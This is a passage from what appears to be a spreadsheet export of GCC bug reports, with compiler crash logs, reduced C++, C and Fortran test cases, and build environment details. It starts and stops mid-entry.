gnu/xml/transform/.libs/ElementAvailableFunction.o
gnu/xml/transform/.libs/IfNode.o gnu/xml/transform/.libs/ApplyTemplatesNode.o
gnu/xml/transform/.libs/SortKey.o gnu/xml/transform/.libs/Key.o
gnu/xml/transform/.libs/ElementNode.o gnu/xml/transform/.libs/CurrentFunction.o
gnu/xml/transform/.libs/XSLComparator.o
gnu/xml/transform/.libs/CallTemplateNode.o
gnu/xml/transform/.libs/TemplatesImpl.o gnu/xml/transform/.libs/ChooseNode.o
gnu/xml/transform/.libs/NumberNode.o gnu/xml/transform/.libs/CopyOfNode.o
gnu/xml/transform/.libs/ParameterNode.o
gnu/xml/transform/.libs/TransformerFactoryImpl.o
gnu/xml/transform/.libs/TextNode.o gnu/xml/transform/.libs/CopyNode.o
gnu/xml/transform/.libs/SystemPropertyFunction.o
gnu/xml/transform/.libs/Stylesheet.o
gnu/xml/transform/.libs/ProcessingInstructionNode.o
gnu/xml/transform/.libs/UnparsedEntityUriFunction.o
gnu/xml/transform/.libs/URIResolverEntityResolver.o
gnu/xml/transform/.libs/ErrorListenerErrorHandler.o
gnu/xml/transform/.libs/Bindings.o gnu/xml/transform/.libs/AttributeSet.o
gnu/xml/transform/.libs/Template.o gnu/xml/transform/.libs/MessageNode.o
gnu/xml/transform/.libs/LiteralNode.o gnu/xml/transform/.libs/StreamSerializer.o
gnu/xml/transform/.libs/XSLURIResolver.o gnu/xml/transform/.libs/AttributeNode.o
gnu/xml/transform/.libs/CommentNode.o gnu/xml/transform/.libs/ForEachNode.o
gnu/xml/transform/.libs/KeyFunction.o gnu/xml/transform/.libs/TransformerImpl.o
gnu/xml/transform/.libs/WhenNode.o gnu/xml/transform/.libs/NodeNumberNode.o
gnu/xml/transform/.libs/OtherwiseNode.o
gnu/xml/transform/.libs/AbstractNumberNode.o
gnu/xml/transform/.libs/TemplateNode.o
gnu/xml/transform/.libs/TransformerOutputProperties.o
gnu/xml/transform/.libs/DOMSourceLocator.o java/lang/.libs/ConcreteProcess.o
gnu/classpath/.libs/Configuration.o .libs/boehm.o .libs/posix.o
.libs/posix-threads.o gnu/regexp/.libs/MessagesBundle.properties.o
gnu/regexp/.libs/MessagesBundle_fr.properties.o
org/ietf/jgss/.libs/MessagesBundle.properties.o .libs/libgcj.la-1.o
/build/buildd/gcc-snapshot-20050212/build/gcc/xgcc -shared-libgcc
-B/build/buildd/gcc-snapshot-20050212/build/gcc/ -nostdinc++
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src/.libs
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/bin/
-B/usr/lib/gcc-snapshot/alpha-linux-gnu/lib/ -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/include -isystem
/usr/lib/gcc-snapshot/alpha-linux-gnu/sys-include -shared -nostdlib
/usr/lib/crti.o /build/buildd/gcc-snapshot-20050212/build/gcc/crtbeginS.o
.libs/libgcj.la-2.o -Wl--whole-archive external/sax/.libs/libsax_convenience.a
external/w3c_dom/.libs/libw3c_convenience.a ../libffi/.libs/libffi_convenience.a
../boehm-gc/.libs/libgcjgc_convenience.a ./libltdl/.libs/libltdlc.a
-Wl--no-whole-archive 
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libstdc++-v3/src/.libs
-L/build/buildd/gcc-snapshot-20050212/build/alpha-linux-gnu/libjava
external/sax/.libs/libsax_convenience.a
external/w3c_dom/.libs/libw3c_convenience.a ../libffi/.libs/libffi_convenience.a
../boehm-gc/.libs/libgcjgc_convenience.a -lpthread ./libltdl/.libs/libltdlc.a
-ldl -lz -L/build/buildd/gcc-snapshot-20050212/build/gcc -lgcc_s -lc -lgcc_s   
  /build/buildd/gcc-snapshot-20050212/build/gcc/crtendS.o /usr/lib/crtn.o 
-Wl-soname -Wllibgcj.so.6 -o .libs/libgcj.so.6.0.0
/usr/bin/ld: .libs/libgcj.la-2.o: .got subsegment exceeds 64K (size 109416)
/usr/bin/ld: failed to set dynamic section sizes: File format not recognized
collect2: ld returned 1 exit status
make[5]: *** [libgcj.la] Error 1</t>
  </si>
  <si>
    <t>GCC-187</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: Sun 30 Apr 2000 21:44:28 +0200 (CEST)
 Original-Message-ID: 
 My command line was:
 gcc -v --save-temps -c mididevice_chardev.C
 The .ii file and GCC output is attached.
gcc: 1: No such file or directory
Reading specs from /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/specs
gcc version 2.95.2 19991024 (release)
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di586 -Dpentium -D__i586 -D__i586__ -D__pentium -D__pentium__ mididevice_chardev.C mididevice_chardev.ii
GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
#include ... search starts here:
#include  search starts here:
 /usr/local/qt-2.1.0/include
 /usr/local/qt/include
 /usr/local/qt/include
 /usr/local/qt/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/../../../../include/g++-3
 /usr/local/include
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/include
 /usr/include
End of search list.
The following default directories have been omitted from the search path:
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/../../../../i586-mandrake-linux/include
End of omitted list.
 /usr/lib/gcc-lib/i586-mandrake-linux/2.95.2/cc1plus mididevice_chardev.ii -quiet -dumpbase mididevice_chardev.cc -version -o mididevice_chardev.s
GNU C++ version 2.95.2 19991024 (release) (i586-mandrake-linux) compiled by GNU C version 2.95.2 19991024 (release).
mididevice_chardev.C: In function `static void MIDI::Device::delay(int)':
mididevice_chardev.C:122: Internal compiler error in `gen_lowpart' at emit-rtl.c:1065
Please submit a full bug report.
See  for instructions.
Release:
2.95.2
How-To-Repeat:
See attachments for mididevice_chardev.ii.bz2
</t>
  </si>
  <si>
    <t>GCC-65815</t>
  </si>
  <si>
    <t>brace elision doesn't work in NSDMI</t>
  </si>
  <si>
    <t>On Page 975 of The C++ Programming Language 4th edition Bjarne Stroustrup says:
An array can be initialized by an initializer list:
array a1 = { 1 2 3 }
and Clang (V 3.5) accepts it. However G++ 4.9.2 thinks this is an error:
error: array must be initialized with a brace-enclosed initializer
     const std::array _ar0val = {1.0 -1.0 1.0}
The ugly fix is:
#ifdef __GNUC__
    const std::array _ar0val{{1.0 -1.0 1.0}}
#else
    const std::array _ar0val = {1.0 -1.0 1.0}
#endif
but of course it is still a bug.</t>
  </si>
  <si>
    <t>andras.aszodi</t>
  </si>
  <si>
    <t>GCC-11250</t>
  </si>
  <si>
    <t>-pedantic accepts `char a[] = (x)'</t>
  </si>
  <si>
    <t xml:space="preserve">	char[] and wchar_t[] arrays may be initialized from [wide]
	string literals optionally enclosed in braces but not from
	more complex expressions.  ANSI 3.5.7p14-15.  -pedantic
	does not catch parentheses around the literal.
Environment:
System: SunOS bombur.uio.no 5.8 Generic_108528-21 sun4u sparc SUNWUltra-5_10
Architecture: sun4
host: sparc-sun-solaris2.8
build: sparc-sun-solaris2.8
target: sparc-sun-solaris2.8
configured with: ../gcc-3.3/configure --enable-languages=cc++f77 --disable-shared --disable-multilib --prefix=/bombur/tmp/gcc --enable-version-specific-runtime-libs --enable-threads
How-To-Repeat:
	bash$ gcc -ansi -pedantic -S a.c
	bash$ cat a.c
	#include 
	char    c[] = (y)
	wchar_t w[] = (Lx)</t>
  </si>
  <si>
    <t>GCC-13616</t>
  </si>
  <si>
    <t>fails to look up template specialization of template template parameter involving own template parameters</t>
  </si>
  <si>
    <t>gcc fails to look up a template specialization of a template template parameter 
with a template class instanciated with one of its own template parameters.
Following code compiles fine but produces general as output where 
specialization would be expected. I did not include a preprocessed version of 
the code because  is only used to show wich version of class C is 
instanciated.
Compiled on:
Gentoo Linux 1.4
gcc version 3.2.3 20030422
code:
#include 
template &lt;
	class T
	class P
&gt; class PPImpl { }
template struct PP {
	template class Type : PPImpl { }
}
template &lt;
	class P 
	template  class Q
&gt; class C {
public:
	C() { std::cout &lt;&lt; general\n }
}
template &lt;
	class P
&gt; class C ::Type &gt; {
public:
	C() { std::cout &lt;&lt; specialization\n }
}
int main() {
	C::Type&gt;c
}</t>
  </si>
  <si>
    <t>hetadres</t>
  </si>
  <si>
    <t>GCC-17228</t>
  </si>
  <si>
    <t>ICE when compiling the CGAL branch of fgsd ( i486 Linux g++ 3.3.4 debian )</t>
  </si>
  <si>
    <t>if g++-3.3 -DHAVE_CONFIG_H -I. -I. -I. -I..   -I/usr/X11R6/include 
-I/home/fred/CGAL-3.0.1/include 
-I/home/fred/CGAL-3.0.1/include/CGAL/config/i686_Linux-2.6.7-1-k7_g++-3.3.4 
-DDRAW_WITH_TEXTURES -g -O2 -MT actionwin.o -MD -MP -MF .deps/actionwin.Tpo -c -o 
actionwin.o actionwin.cpp \ 
then mv -f .deps/actionwin.Tpo .deps/actionwin.Po else rm -f .deps/actionwin.Tpo exit 1 
fi 
In file included from Fl_Cursor_Shape.H:39 
                 from mainwin.hpp:48 
                 from actionwin.cpp:35: 
/usr/X11R6/include/X11/Xlib.h:3355: internal compiler error: Erreur de 
   segmentation 
Please submit a full bug report 
with preprocessed source if appropriate. 
See  for instructions. 
For Debian GNU/Linux specific bug reporting instructions see 
. 
The code compile with g++ 3.2.3 
Note : how to attach the preprocessed file ?</t>
  </si>
  <si>
    <t>fredlist01</t>
  </si>
  <si>
    <t>GCC-7519</t>
  </si>
  <si>
    <t>mipsel-linux-g++ crashes with: Internal error: Killed (program cc1plus)</t>
  </si>
  <si>
    <t>g++ crashes with
mipsel-linux-g++: Internal error: Killed (program cc1plus)
when compiling to object:
// begin code
class A {
  public:
    char foo[128*128*128]
}
class B : public A { }
// end code
% mipsel-linux-g++ -v
Configured with: ../gcc-3.0.4/configure --target=mipsel-linux --with-gnu-as --with-gnu-ld --with-headers=../newlib-1.9.0/newlib/libc/include --with-as=mipsel-linux-as --with-ld=mipsel-linux-ld --disable-shared --enable-threads=single --enable-languages=cc++ --with-newlib
Thread model: single
gcc version 3.0.4
Release:
g++ 3.0.4 (also 3.1.1)
Environment:
gcc-3.0.4 --target=mipsel-linux --with-gnu-as --with-gnu-ld --enable-threads=single --with-newlib
on Linux i686 (newlib 1.9.0)
How-To-Repeat:
compile to object the code snipet:
// begin code
class A {
  public:
    char foo[128*128*128]
}
class B : public A { }
// end code</t>
  </si>
  <si>
    <t>hul</t>
  </si>
  <si>
    <t>GCC-7567</t>
  </si>
  <si>
    <t>g++ 3.3 ICE in decl_jump_unsafe</t>
  </si>
  <si>
    <t>gcc crashes on the following (invalid) input:
$ g++ -c x2.cc
x2.cc: In function `void foo(int)':
x2.cc:7: error: variable `C x' has initializer but incomplete type
x2.cc:9: internal compiler error: tree check: expected class 't' have 'x' (
   error_mark) in decl_jump_unsafe at cp/decl.c:4838
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$
Release:
3.3 20020808 (experimental)
Environment:
System: Linux karma 2.4.9-13 #1 Tue Oct 30 20:11:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../egcs/configure --prefix=/usr/local/egcs --enable-threads=posix --enable-long-long : (reconfigured)  : (reconfigured)
How-To-Repeat:
---------------------------------------------------
class C
void foo (int c)
{
  switch (c) {
  case 0:
    C x = 1
    break
  default:
    break
  }
}
---------------------------------------------------
Unformatted:
 SEND-PR: Leave Confidential as no all GCC PRs are public.
 SEND-PR: critical     GCC is completely not operational no work-around known.
 SEND-PR: serious      GCC is not working properly a work-around is possible.
 SEND-PR: non-critical Report indicates minor problem.
 SEND-PR: medium       The problem should be solved in the next release.
 SEND-PR: low          The problem should be solve in a future release.
 SEND-PR: doc-bug          The documentation is incorrect.
 SEND-PR: accepts-illegal  GCC fails to reject erroneous code.
 SEND-PR: rejects-legal    GCC gives an error message for correct code.
 SEND-PR: wrong-code       The machine code generated by gcc is incorrect.
 SEND-PR: ice-on-legal-code   GCC gives an Internal Compiler Error (ICE)
 SEND-PR:                     for correct code
 SEND-PR: ice-on-illegal-code GCC gives an ICE instead of reporting an error
 SEND-PR: pessimizes-code     GCC misses an important optimization opportunity
 SEND-PR: sw-bug              Software bug of some other class than above
 SEND-PR: change-request      A feature in GCC is missing.
 SEND-PR: support             I need help with gcc.</t>
  </si>
  <si>
    <t>GCC-5831</t>
  </si>
  <si>
    <t>AW: libstdc++/5825: std::__basic_file not compilable</t>
  </si>
  <si>
    <t xml:space="preserve"> Hi
 sorry for the forgotten version information.
 The output for g++ -v is:
 Reading specs from =
 /usr/local/gcc31/lib/gcc-lib/i686-pc-linux-gnu/3.1/specs
 Configured with: ../configure --enable-threads =
 --prefix=3D/usr/local/gcc31
 --enable-shared
 Thread model: posix
 gcc version 3.1 20020302 (prerelease)
 Best regards
 Dr. Axel Zeuner
 Consultant e.Business Delivery D
 SYSTOR GmbH &amp; Co. KG =20
 Darmst=E4dter Landstra=DFe 184 60598 Frankfurt am Main
 Phone: +49 (0)69 - 96 88 51 41   	Fax: +49 (0)69 - 96 88 51 30
 eMail axel.zeuner@systor.com  		W3: http://www.systor.com
 ------------------------------------------------------------------------=
 --
 Murphy's Law fails only when you try to demonstrate it and thus =
 succeeds.
 &gt; -----Urspr=FCngliche Nachricht-----
 &gt; Von: pme@gcc.gnu.org [mailto:pme@gcc.gnu.org]
 &gt; Gesendet am: Montag 4. M=E4rz 2002 16:50
 &gt; An: Axel.Zeuner@systor.com gcc-bugs@gcc.gnu.org =
 gcc-prs@gcc.gnu.org
 &gt; nobody@gcc.gnu.org
 &gt; Betreff: Re: libstdc++/5825: std::__basic_file not compilable
 &gt;=20
 &gt; Synopsis: std::__basic_file not compilable
 &gt;=20
 &gt; State-Changed-From-To: open-&gt;feedback
 &gt; State-Changed-By: pme
 &gt; State-Changed-When: Mon Mar  4 07:50:03 2002
 &gt; State-Changed-Why:
 &gt;     Please send the output of g++ -v.  This appears to be
 &gt;     some kind of configuration error but without a complete
 &gt;     bug report (again read the instructions) we can't tell.
 &gt;=20
 &gt; http://gcc.gnu.org/cgi-bin/gnatsweb.pl?cmd=3Dview%20audit-trail&amp;
 &gt; database=3Dgcc&amp;pr=3D5825
 &gt;=20
Release:
unknown</t>
  </si>
  <si>
    <t>GCC-70022</t>
  </si>
  <si>
    <t>[4.9 Regression] ICE: in tree_to_shwi at tree.c:7328 with out-of-bounds vector index</t>
  </si>
  <si>
    <t>Created attachment 37827
reduced testcase
Compiler output:
$ gcc testcase.c 
testcase.c: In function 'foo':
testcase.c:6:4: internal compiler error: in tree_to_shwi at tree.c:7328
   v[~0ULL]
   ~^~~~~~~
0xe40e42 tree_to_shwi(tree_node const*)
        /repo/gcc-trunk/gcc/tree.c:7328
0x87c2b4 fold_indirect_ref_1(unsigned int tree_node* tree_node*)
        /repo/gcc-trunk/gcc/fold-const.c:14221
0x89c9e3 fold_indirect_ref_loc(unsigned int tree_node*)
        /repo/gcc-trunk/gcc/fold-const.c:14300
0x8fe098 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        /repo/gcc-trunk/gcc/gimplify.c:10276
0x900b96 gimplify_stmt(tree_node** gimple**)
        /repo/gcc-trunk/gcc/gimplify.c:5644
0x901dd5 gimplify_bind_expr
        /repo/gcc-trunk/gcc/gimplify.c:1142
0x8fbe62 gimplify_expr(tree_node** gimple** gimple** bool (*)(tree_node*) int)
        /repo/gcc-trunk/gcc/gimplify.c:10363
0x900b96 gimplify_stmt(tree_node** gimple**)
        /repo/gcc-trunk/gcc/gimplify.c:5644
0x9029f4 gimplify_body(tree_node* bool)
        /repo/gcc-trunk/gcc/gimplify.c:11295
0x903086 gimplify_function_tree(tree_node*)
        /repo/gcc-trunk/gcc/gimplify.c:11451
0x7639c7 cgraph_node::analyze()
        /repo/gcc-trunk/gcc/cgraphunit.c:625
0x766d33 analyze_functions
        /repo/gcc-trunk/gcc/cgraphunit.c:1086
0x767a78 symbol_table::finalize_compilation_unit()
        /repo/gcc-trunk/gcc/cgraphunit.c:2540
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
All targets seem to be affected.
Tested revisions:
trunk r233801 - FAIL
5-branch r233800 - FAIL
4_9-branch r233802 - FAIL
4_8-branch r224828 - FAIL (in tree_low_cst)
4_7-branch r211571 - OK</t>
  </si>
  <si>
    <t>GCC-41878</t>
  </si>
  <si>
    <t>[4.5 Regression] ERROR: gfortran.dg/vect/vect-2.f90</t>
  </si>
  <si>
    <t>On Linux/ia64 I got
ERROR: gfortran.dg/vect/vect-2.f90  -O : error executing dg-final: syntax error in target selector target ! vector_alignment_reachable
Apparently
{ target { vect_no_align &amp;&amp; { {! vector_alignment_reachable } } } }
doesn't work. But
{ target { vect_no_align &amp;&amp; { ! vector_alignment_reachable } } }
works.</t>
  </si>
  <si>
    <t>GCC-16861</t>
  </si>
  <si>
    <t>[4.0 only] segfault with doubly used module</t>
  </si>
  <si>
    <t>gfortran segfaults while compiling an f90 source file that uses modules.</t>
  </si>
  <si>
    <t>yosef</t>
  </si>
  <si>
    <t>GCC-2111</t>
  </si>
  <si>
    <t>Class derivation over embedded templates</t>
  </si>
  <si>
    <t>The problem appears through a templated class deriving itself based on its templates. This does not present a problem immediately. However whe nthe initial template is passed to another template the result is ICE.
Release:
gcc version 2.95.2 20000220 (Debian GNU/Linux)
Environment:
BASH=/bin/bash
BASH_VERSINFO=([0]=2 [1]=04 [2]=0 [3]=1 [4]=release [5]=i386-pc-linux-gnu)
BASH_VERSION='2.04.0(1)-release'
COLUMNS=86
DIRSTACK=()
EUID=1022
GROUPS=()
HISTFILE=/home/src/.bash_history
HISTFILESIZE=500
HISTSIZE=500
HOME=/home/src
HOSTNAME=chaos
HOSTTYPE=i386
IFS=' 
'
LANG=C
LINES=33
LOGNAME=archdragon
LS_COLORS=
MACHTYPE=i386-pc-linux-gnu
MAIL=/var/spool/mail/archdragon
MAILCHECK=60
OLDPWD=/usr/src/proftpd-1.2.0pre10/contrib
OPTERR=1
OPTIND=1
OSTYPE=linux-gnu
PATH=/usr/local/bin:/usr/bin:/bin:/usr/bin/X11:/usr/games
PIPESTATUS=([0]=0)
PPID=13595
PS1='\u@\h:\w\$ '
PS2='&gt; '
PS4='+ '
PWD=/usr/src/proftpd-1.2.0pre10/contrib/mod_alctrl
SHELL=/bin/bash
SHELLOPTS=braceexpand:hashall:histexpand:monitor:history:interactive-comments:emacs
SHLVL=2
SSH_TTY=/dev/pts/0
TERM=vt102
UID=1022
USER=archdragon
_=set
How-To-Repeat:
This is detailed buy the script session included as an attachment...</t>
  </si>
  <si>
    <t>arch</t>
  </si>
  <si>
    <t>GCC-4702</t>
  </si>
  <si>
    <t>arm-elf-gcc  generates undefined for __gxx_personality_sj0</t>
  </si>
  <si>
    <t>The arm-elf-gcc distribution gives an undefined reference to __gxx_personailty_sj0.  If the class definition class members and main() are in the same file it will build.
Release:
arm-elf-gcc 3.0.3 20011026
Environment:
cygwin
How-To-Repeat:
build the arm-elf-gcc distribution 
arm-elf-gcc -v -save-temps t.cpp tt.cpp
the src.zip files t.cpp tt.cpp tt.h t.ii tt.ii and build.out</t>
  </si>
  <si>
    <t>rslaughter</t>
  </si>
  <si>
    <t>GCC-69187</t>
  </si>
  <si>
    <t>ICE: Aborted when native compiling neon code with __builtin_neon_vmlals_lanev4hi</t>
  </si>
  <si>
    <t>Created attachment 37256
bug.c - minimal test case for the bug.
katje ~ # gcc -c -mfpu=neon ./bug.c 
*** stack smashing detected ***: /usr/libexec/gcc/armv7a-hardfloat-linux-gnueabi/5.3.0/cc1 terminated
./bug.c: In function â€˜bugâ€™:
./bug.c:3:9: internal compiler error: Aborted
         __builtin_neon_vmlals_lanev4hi(a b c 0)
         ^
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The most minimal test case I was able to find is in attachments.
This doesn't happen when crosscompiling:
civil@felix 0:  0 ~ $ armv7a-hardfloat-linux-gnueabi-c++-5.3.0 -c -mfpu=neon ~/bug.c 
civil@felix 0:  0 ~ $</t>
  </si>
  <si>
    <t>civil.over</t>
  </si>
  <si>
    <t>GCC-8465</t>
  </si>
  <si>
    <t>GCC 3.2 rejects legal overloads of template member functions</t>
  </si>
  <si>
    <t>GCC 3.2 can't compile the test-case overload.cpp listed in How-To-Repeat. Alexandrescu's loki-lib contains code like that (MultiMethods.h/FnDispatcher::Add()) so it can't be compiled either.
g++ overload.cpp
overload.cpp:5: `template void A::f()' and `template void A::f()' cannot be overloaded
overload.cpp: In function `int main()':
overload.cpp:11: no matching function for call to `A::f()'
Release:
Reading specs from /usr//bin/../lib/gcc-lib/i586-mandrake-linux-gnu/3.2/specs
Environment:
Mandrake Linux 9.0 / Pentium II
How-To-Repeat:
// file overload.cpp
struct A {
	template            void f() { }
	template void f() { }
}
int main() {
	A a
	a.f()
	a.f()
}
Unformatted:
 Configured with: ../configure --prefix=/usr --libdir=/usr/lib --with-slibdir=/lib --mandir=/usr/share/man --infodir=/usr/share/info --enable-shared --enable-threads=posix --disable-checking --enable-long-long --enable-__cxa_atexit --enable-languages=cc+ +adaf77objcjava --host=i586-mandrake-linux-gnu --with-system-zlib
 Thread model: posix
 gcc version 3.2 (Mandrake Linux 9.0 3.2-1mdk)</t>
  </si>
  <si>
    <t>jacques.bouchard</t>
  </si>
  <si>
    <t>GCC-45211</t>
  </si>
  <si>
    <t>C interoperable error when compiling BIND(C) function in a module.</t>
  </si>
  <si>
    <t>gfortran (all versions 4.2-4.5) reports the error when trying to compile code below:
Error: Type 'link_info' at (1) is a parameter to the BIND(C)  procedure 'liter_cb' but is not C interoperable because derived type 'info_t' is not C interoperable
when I remove the module and compile just the function it compiles fine. info_t is interoperable with C
MODULE liter_cb_mod
USE ISO_C_BINDING
CONTAINS
  FUNCTION liter_cb(link_info) bind(C)
    USE ISO_C_BINDING
    IMPLICIT NONE
    INTEGER(c_int) liter_cb
    TYPE bind(C) :: info_t
       INTEGER(c_int) :: type
    END TYPE info_t
    TYPE(info_t) :: link_info
    liter_cb = 0
  END FUNCTION liter_cb
END MODULE liter_cb_mod</t>
  </si>
  <si>
    <t>brtnfld</t>
  </si>
  <si>
    <t>GCC-48166</t>
  </si>
  <si>
    <t>[4.6/4.7 Regression] ICE on static member function with invalid type qualifier</t>
  </si>
  <si>
    <t>Using gcc version 4.6.0 20110317 (svn revision 171087) on x86-64 Linux with the code
struct foo {
  static void func ()
}
void foo::func () const {}
and compile line g++ -c test_static.cc gives the following:
test_static.cc:4:19: internal compiler error: in merge_types at cp/typeck.c:825
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
The code is clearly invalid (g++ 4.5 indeed gives the following error message: test_static.cc:4:19: error: static member function â€˜void foo::func()â€™ declared with type qualifiers) but g++ 4.6 returns with an ICE.</t>
  </si>
  <si>
    <t>GCC-33947</t>
  </si>
  <si>
    <t>[4.3 Regression] warning: 'const' attribute directive ignored</t>
  </si>
  <si>
    <t>On ARM I get a lot of gfortran testsuite failures because of test for
excess errors.  They are due to these warnings:
(sid)1109:tbm@foobar: ~] /usr/lib/gcc-snapshot/bin/gfortran -c Wall.f90
Wall.f90:0: warning: 'const' attribute directive ignored
Wall.f90:0: warning: 'nothrow' attribute directive ignored
(sid)1110:tbm@foobar: ~]
This doesn't happen with 4.1 and 4.2:
(sid)1110:tbm@foobar: ~] gfortran-4.1 -c Wall.f90
(sid)1111:tbm@foobar: ~] gfortran-4.2 -c Wall.f90
(sid)1112:tbm@foobar: ~]
Testcase:
program main
end program main</t>
  </si>
  <si>
    <t>GCC-25359</t>
  </si>
  <si>
    <t>some objc.dg-struct-layout-encoding-1 failures</t>
  </si>
  <si>
    <t>The objc.dg-struct-layout-encoding-1 failures happen on ppc-darwin:
FAIL: objc.dg-struct-layout-encoding-1/t003_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t004_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t006_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t008_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t010_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t012_main.m execution test
FAIL: objc.dg-struct-layout-encoding-1/t021_main.m execution test
This is due to ADJUST_FIELD_ALIGN returning the wrong value for struct {double a} which needs an alignment of 4 and not 8.</t>
  </si>
  <si>
    <t>GCC-19684</t>
  </si>
  <si>
    <t>avr wrong size in asm comment (peephole)</t>
  </si>
  <si>
    <t>Comment about function `foo' size: 
  27                    /* function foo size 10 (9) */ 
show wrong value. (Compare it with next function.) 
Compiler: avr-gcc (GCC) 4.0.0 20050109 (experimental) 
Options:  -W -Wall -Os -Wa-ahl 
The same error (for `foo') in 3.3.4 . 
Certainly it is nonsense. But maybe this display 
of more serious mistake? 
Program: 
~~~~~~~~ 
int foo (int x) 
{ 
    int i 
    for (i= 10 i i--) 
        x *= 2 
    return x 
} 
int foo_with_true_size (int x) 
{ 
    x += 100 
    do { 
        x *= 2 
    } while (x &gt; 0) 
    return x 
} 
Listing: 
~~~~~~~~ 
GAS LISTING /tmp/ccJGSrye.s                     page 1 
   1                            .file   foo.c 
   2                            .arch avr2 
   3                    __SREG__ = 0x3f 
   4                    __SP_H__ = 0x3e 
   5                    __SP_L__ = 0x3d 
   6                    __tmp_reg__ = 0 
   7                    __zero_reg__ = 1 
   8                            .global __do_copy_data 
   9                            .global __do_clear_bss 
  10                            .text 
  11                    .global foo 
  12                            .type   foo @function 
  13                    foo: 
  14                    /* prologue: frame size=0 */ 
  15                    /* prologue end (size=0) */ 
  16 0000 2AE0                  ldi r18lo8(10) 
  17 0002 30E0                  ldi r19hi8(10) 
  18                    .L2: 
  19 0004 880F                  add r24r24 
  20 0006 991F                  adc r25r25 
  21 0008 2150                  subi r18lo8(-(-1)) 
  22 000a 3040                  sbci r19hi8(-(-1)) 
  23 000c D9F7                  brne .L2 
  24                    /* epilogue: frame size=0 */ 
  25 000e 0895                  ret 
  26                    /* epilogue end (size=1) */ 
  27                    /* function foo size 10 (9) */ 
  28                            .size   foo .-foo 
  29                    .global foo_with_true_size 
  30                            .type   foo_with_true_size @function 
  31                    foo_with_true_size: 
  32                    /* prologue: frame size=0 */ 
  33                    /* prologue end (size=0) */ 
  34 0010 8C59                  subi r24lo8(-(100)) 
  35 0012 9F4F                  sbci r25hi8(-(100)) 
  36                    .L8: 
  37 0014 880F                  add r24r24 
  38 0016 991F                  adc r25r25 
  39 0018 1816                  cp __zero_reg__r24 
  40 001a 1906                  cpc __zero_reg__r25 
  41 001c DCF3                  brlt .L8 
  42                    /* epilogue: frame size=0 */ 
  43 001e 0895                  ret 
  44                    /* epilogue end (size=1) */ 
  45                    /* function foo_with_true_size size 8 (7) */ 
  46                            .size   foo_with_true_size .-foo_with_true_size 
  47                    /* File foo.c: code   18 = 0x0012 (  16) prologues 
0 epilogues   2 */</t>
  </si>
  <si>
    <t>GCC-44125</t>
  </si>
  <si>
    <t>[4.6 Regression] const-str-9 fails.</t>
  </si>
  <si>
    <t>compiling at -O0 makes no difference (neither does -mmacosx-version-min=10.4 which should eliminate the Object1.h header from the enquiry).
===
most of the (usually) emitted code is missing all that remains is:
        .lazy_reference .objc_class_name_NSConstantString
.comm __NSConstantStringClassReference42
        .subsections_via_symbols
===</t>
  </si>
  <si>
    <t>GCC-52102</t>
  </si>
  <si>
    <t>[OOP] Wrong result with ALLOCATE of CLASS components with array constructor SOURCE-expr</t>
  </si>
  <si>
    <t>The following program which is an extension of testsuite/gfortran.dg/class_48.f90 and thus PR 51972 fails to correctly set the value via SOURCE:
  allocate (two%a(2) source=[t(4) t(6)])
Should give for two%a(1)%x and two%a(2)%x the values 4 and 6 but one gets 0 0. If one uses not a class component but a class variable the result is 4 0.
There is a similar PR for polymorphic sources cf. PR 51864.
subroutine test3 ()
  type t
    integer :: x
  end type t
  type t2
    class(t) allocatable :: a(:)
  end type t2
  type(t2) :: one two
  one = two
  if (allocated (one%a)) call abort ()
  allocate (two%a(2) source=[t(4) t(6)])
  one = two
  if (.not.allocated (one%a)) call abort ()
  print * one%a(1)%x
  print * one%a(6)%x
  if ((one%a(1)%x /= 4)) call abort ()
  if ((one%a(2)%x /= 6)) call abort ()
  deallocate (two%a)
  one = two
  if (allocated (one%a)) call abort ()
end subroutine test3</t>
  </si>
  <si>
    <t>GCC-8513</t>
  </si>
  <si>
    <t>g++ internal compiler error</t>
  </si>
  <si>
    <t xml:space="preserve">	When running g++ 3.1 or 3.2 on the following input I get an ICE:
	r.cpp: In static member function `static void (* A::GetFunc())()':
	r.cpp:15: Internal compiler error in c_expand_expr at c-common.c:3646
Release:
3.1 or 3.2
Environment:
System: Linux zort 2.4.9-13psmp #1 SMP Tue Nov 13 15:24:04 EST 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: i686-pc-linux-gnu
configured with: ../gcc-3.2/configure --prefix=/pixar/d2 --enable-languages=cc++ --disable-nls --disable-shared
How-To-Repeat:
	Run g++ -c on the following code. (I simplified it as much as possible.)
----------------
typedef void (*FuncType)()
class A {
  public:
    template static void Func()
    static FuncType GetFunc()
}
template   class B {}
FuncType
A::GetFunc()
{
